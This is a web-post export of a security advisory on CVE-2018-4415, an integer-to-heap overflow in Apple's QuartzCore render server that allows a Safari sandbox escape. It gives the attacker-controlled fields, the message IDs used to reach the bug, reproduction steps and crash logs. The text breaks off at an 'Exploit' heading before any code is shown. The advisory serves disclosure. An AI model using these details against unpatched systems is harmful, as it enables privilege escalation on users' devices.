{"id":13976,"date":"2018-12-02T14:19:07","date_gmt":"2018-12-02T22:19:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/12\/02\/news-7743\/"},"modified":"2018-12-02T14:19:07","modified_gmt":"2018-12-02T22:19:07","slug":"news-7743","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/12\/02\/news-7743\/","title":{"rendered":"SSD Advisory \u2013 iOS\/macOS Safari Sandbox Escape via QuartzCore Heap Overflow"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Sun, 02 Dec 2018 13:08:59 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> QuartzCore ( https:\/\/developer.apple.com\/documentation\/quartzcore ), also known as CoreAnimation, is a framework use by macOS and iOS to build an animatable scene graph. CoreAnimation uses a unique rendering model where the graphics operations are run in a separate process. On macOS, the process is WindowServer and on iOS the name is backboardd. Both of these process are out of sandbox and have the right to call setuid. The service name QuartzCore is usually referenced as CARenderServer. This service exists on both macOS and iOS and can be accessed from the Safarisandbox and therefore has been used for Pwn2Own on many occasions.\u00a0There exists an integer overflow which can lead to heap over flow in QuartzCore on latest macOS\/iOS.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;CoreAnimation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4415: Liang Zhuo working with Beyond Security\u2019s SecuriTeam Secure Disclosure&#8221;<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-4415<\/p>\n<p><strong>Credit<\/strong><br \/> An independent Security Researcher, Zhuo Liang,\u00a0has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3796\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> macOS 10.14<br \/> iOS 12.10<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The root cause of this vulnerability lies in QuartzCore`CA::Render::InterpolatedFunction::InterpolatedFunction function, this function does not notice the case of integer overflow. In the<br \/> sections will discuss the details of this vulnerability on both macOS and iOS.<\/p>\n<p><strong>macOS 10.14<\/strong><br \/> On macOS, there is an useful API to retrive open the CARenderService named CGSCreateLayerContext(Not exists on iOS). The attacker can send messages to the service port with message id 0x9C42 or 0x9C43. When the process(server_thread, actually) receives this message of the specified message ids, it will go into a procedure like deserialization. With proper data fed the execution stream will go into function CA::Render::InterpolatedFunction::InterpolatedFunction.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14.png\" data-slb-active=\"1\" data-slb-asset=\"1158156125\" data-slb-internal=\"0\" data-slb-group=\"3796\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3797\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png\" alt=\"\" width=\"598\" height=\"516\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14.png 574w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/a><\/p>\n<p>Notice at (a) and (b) the value of these two member can be controlled by attacker(CA uses functions like CA::Render::Decoder::decode* to deserialize objects), and in CA::Render::InterpolatedFunction::allocate_storage function, these values will be used to decide the size of memory to be allocate.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2.png\" data-slb-active=\"1\" data-slb-asset=\"1087547554\" data-slb-internal=\"0\" data-slb-group=\"3796\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3798\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2-300x223.png\" alt=\"\" width=\"595\" height=\"442\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2-300x223.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2.png 569w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/a><\/p>\n<p>At (d), v3 is controlled by values at (a) and (b). And v4 at (e) can also be controlled by attacker at (c). So the size of the memory to allocate is 4 * (v4 + v3). But look at (f) carefully, the third parameter passed to CA::Render::Decoder::decode_bytes is actually 4 * v3. The simplest form of CA::Render::Decoder::decode_bytes at (f) is like memcpy(v2, v8, 4 * v3) or memset(v2, 0, 4 * v3). So the heap overflow leading by integer overflow happens when 4 * (v4 + v3) overflows but 4 * v3 not. The proof combination of those attacker controlled values which can lead to proper integer overflow can be found in the exploit in the end of this advisory.<\/p>\n<p>Reproduction of this issue on macOS can be done as follows:<br \/> 1. clang QuartzCoreFunctionIntOverFlow.c -o<br \/> quartz_core_function_over_flow -framework CoreGraphics<br \/> 2. .\/quartz_core_function_over_flow<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c045a5ab3036745693342\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 1 Thread 0 Crashed:: Dispatch queue: com.apple.main\u2212thread  com.apple.CoreFoundation 0x00007fff332e2daf __CFBasicHashAddValue + 2077  com.apple.CoreFoundation 0x00007fff332e33f5 CFDictionarySetValue + 187  com.apple.SkyLight 0x00007fff595ebfa9 CGXPostPortNotification + 123  com.apple.SkyLight 0x00007fff595eb947 notify_handler + 73  com.apple.SkyLight 0x00007fff595eb2d9 post_port_data + 237  com.apple.SkyLight 0x00007fff595eafba run_one_server_pass + 949  com.apple.SkyLight 0x00007fff595eab90 CGXRunOneServicesPass + 460  com.apple.SkyLight 0x00007fff595eb820 server_loop + 96  com.apple.SkyLight 0x00007fff595eb7b5 SLXServer + 1153  WindowServer 0x000000010011d4c4 0x10011c000 + 5316  libdyld.dylib 0x00007fff6036ced5 start + 1  Thread 2:: com.apple.coreanimation.render\u2212server \/\/ CARenderServer thread  libsystem_platform.dylib 0x00007fff6056ce09 _platform_bzero$VARIANT$Haswell  + 41  com.apple.QuartzCore 0x00007fff3e8ebaa4 CA::Render::Decoder::  decode_bytes(void*, unsigned long) + 46  com.apple.QuartzCore 0x00007fff3e8c35f7 CA::Render::InterpolatedFunction  ::InterpolatedFunction(CA::Render::Decoder*) + 191  com.apple.QuartzCore 0x00007fff3e8c3524 CA::Render::Function::decode(CA  ::Render::Decoder*) + 224  com.apple.QuartzCore 0x00007fff3e8ecb8a CA::Render::Decoder::  decode_object(CA::Render::Type) + 946  com.apple.QuartzCore 0x00007fff3e8edc8e CA::Render::decode_commands(CA::  Render::Decoder*) + 871  com.apple.QuartzCore 0x00007fff3e896422 CA::Render::Server::  ReceivedMessage::run_command_stream() + 748  com.apple.QuartzCore 0x00007fff3e73d2e1 CA::Render::Server::  server_thread(void*) + 1841  com.apple.QuartzCore 0x00007fff3e91427c thread_fun(void*) + 25  libsystem_pthread.dylib 0x00007fff60572795 _pthread_body + 159  libsystem_pthread.dylib 0x00007fff605726e2 _pthread_start + 70  libsystem_pthread.dylib 0x00007fff605722a9 thread_start + 13<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0058 seconds] -->  <\/p>\n<p><strong>iOS 12.10<\/strong><br \/> Since the root cause of this issue is apparent and the code on iOS and macOS is almost the same. In this section We will only discuss the different points between iOS and macOS.<\/p>\n<p>\u2022 There isn\u2019t any API like CGSCreateLayerContext on macOS that can get the CoreAnimation rendering context directly, but through exploring we found the MIG function _XRegisterClient can be used to replace CGSCreateLayerContext. First, attacker should open the service com.apple.CARenderServer(Can be accessed from sandbox), and then call _XRegisterClient by mach_msg with message id 40202.<br \/> \u2022 To reproruce this issue on iOS 12 beta, you should use latest 1Xcode-beta(For latest SDK).<br \/> \u2022 You should import IOKit framework headers according www.malhal.com. Note that the destination directories should be changed to your Xcode-beta Application.<br \/> \u2022 The code lies in function application didFinishLaunchingWithOptions, and will be triggerd when the application starts.<br \/> \u2022 When the Application has been installed, just start the applicationios-sbe.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c045a5ab303f993112620\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 1 Thread 3 name: com.apple.coreanimation.render\u2212server \/\/ CARenderServer thread  2 Thread 3:  0 libsystem_platform.dylib 0x000000018fefe584 0x18fef6000 + 34180  1 QuartzCore 0x0000000194a6e1d4 0x19491e000 + 1376724  2 QuartzCore 0x0000000194a21a58 0x19491e000 + 1063512  3 QuartzCore 0x0000000194a710b8 0x19491e000 + 1388728  4 QuartzCore 0x0000000194a719c0 0x19491e000 + 1391040  5 QuartzCore 0x00000001949fb140 0x19491e000 + 905536  6 QuartzCore 0x00000001949facdc 0x19491e000 + 904412  7 QuartzCore 0x0000000194ab65c8 0x19491e000 + 1672648  8 libsystem_pthread.dylib 0x000000018ff0c26c 0x18ff01000 + 45676  9 libsystem_pthread.dylib 0x000000018ff0c1b0 0x18ff01000 + 45488  10 libsystem_pthread.dylib 0x000000018ff0fd20 0x18ff01000 + 60704    Thread 13 name: Dispatch queue: com.apple.libdispatch\u2212manager  Thread 13 Crashed:  0 libdispatch.dylib 0x000000018fd18514 0x18fcca000 + 320788  1 libdispatch.dylib 0x000000018fd1606c 0x18fcca000 + 311404  2 libdispatch.dylib 0x000000018fd1606c 0x18fcca000 + 311404  3 libdispatch.dylib 0x000000018fd0f1ac 0x18fcca000 + 283052  4 libsystem_pthread.dylib 0x000000018ff0d078 0x18ff01000 + 49272  5 libsystem_pthread.dylib 0x000000018ff0fd18 0x18ff01000 + 60696<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c045a5ab303f993112620-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c045a5ab303f993112620-22\">22<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-1\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">apple<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">coreanimation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">render<\/span>\u2212<span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ CARenderServer thread<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-2\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-3\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_platform<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018fefe584<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18fef6000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">34180<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-4\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000194a6e1d4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1376724<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-5\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000194a21a58<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1063512<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-6\"><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000194a710b8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1388728<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-7\"><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000194a719c0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1391040<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-8\"><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000001949fb140<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">905536<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-9\"><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000001949facdc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">904412<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-10\"><span class=\"crayon-cn\">7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">QuartzCore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000194ab65c8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x19491e000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1672648<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-11\"><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_pthread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018ff0c26c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18ff01000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">45676<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-12\"><span class=\"crayon-cn\">9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_pthread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018ff0c1b0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18ff01000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">45488<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-13\"><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_pthread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018ff0fd20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18ff01000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60704<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-15\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Dispatch <\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">apple<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">libdispatch<\/span>\u2212<span class=\"crayon-e\">manager<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-16\"><span class=\"crayon-i\">Thread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Crashed<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-17\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libdispatch<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018fd18514<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18fcca000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">320788<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-18\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libdispatch<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018fd1606c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18fcca000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">311404<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-19\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libdispatch<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018fd1606c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18fcca000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">311404<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-20\"><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libdispatch<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018fd0f1ac<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18fcca000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">283052<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab303f993112620-21\"><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_pthread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018ff0d078<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18ff01000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">49272<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab303f993112620-22\"><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libsystem_pthread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">dylib<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x000000018ff0fd18<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18ff01000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60696<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0041 seconds] -->  <\/p>\n<p>&nbsp;<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c045a5ab3043485934892\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" 